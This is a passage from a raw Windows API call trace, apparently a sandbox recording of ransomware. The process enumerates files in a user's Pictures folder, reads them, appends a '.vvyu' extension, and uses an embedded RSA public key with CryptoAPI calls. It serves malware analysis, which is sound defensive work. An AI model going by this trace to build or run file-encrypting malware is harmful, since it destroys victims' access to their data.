Flags=0x0, Size=0x430) returned 0x2d42908 [0193.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.577] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.577] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.577] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.577] CloseHandle (hObject=0x584) returned 1 [0193.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d49778 [0193.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.579] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\BfwcyLh4.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\bfwcylh4.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\BfwcyLh4.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\bfwcylh4.gif.vvyu")) returned 1 [0193.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.581] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0193.584] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32bea10, ftCreationTime.dwHighDateTime=0x1d898dd, ftLastAccessTime.dwLowDateTime=0x9d3eb1d0, ftLastAccessTime.dwHighDateTime=0x1d89db6, ftLastWriteTime.dwLowDateTime=0x9d3eb1d0, ftLastWriteTime.dwHighDateTime=0x1d89db6, nFileSizeHigh=0x0, nFileSizeLow=0xfc36, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NLJO_aKDC.png", cAlternateFileName="NLJO_A~1.PNG")) returned 1 [0193.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0193.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.585] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\NLJO_aKDC.png") returned=".png" [0193.585] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\NLJO_aKDC.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\nljo_akdc.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.586] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=64566) returned 1 [0193.586] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.589] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfc10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.589] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.591] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.591] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xfc36, lpOverlapped=0x0) returned 1 [0193.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.592] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.592] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0193.594] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.594] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.594] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.594] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.594] GetLastError () returned 0x0 [0193.594] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.594] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0193.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.594] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.594] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.594] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc40) returned 0x2d49778 [0193.595] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42070 [0193.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d420b8 [0193.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.596] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f28 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39f10 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.599] GetCurrentThreadId () returned 0x264 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45d30 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.600] GetCurrentThreadId () returned 0x264 [0193.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f28 [0193.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f88 [0193.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fa0 [0193.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f40 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f10 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d420b8 | out: hHeap=0x6a0000) returned 1 [0193.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 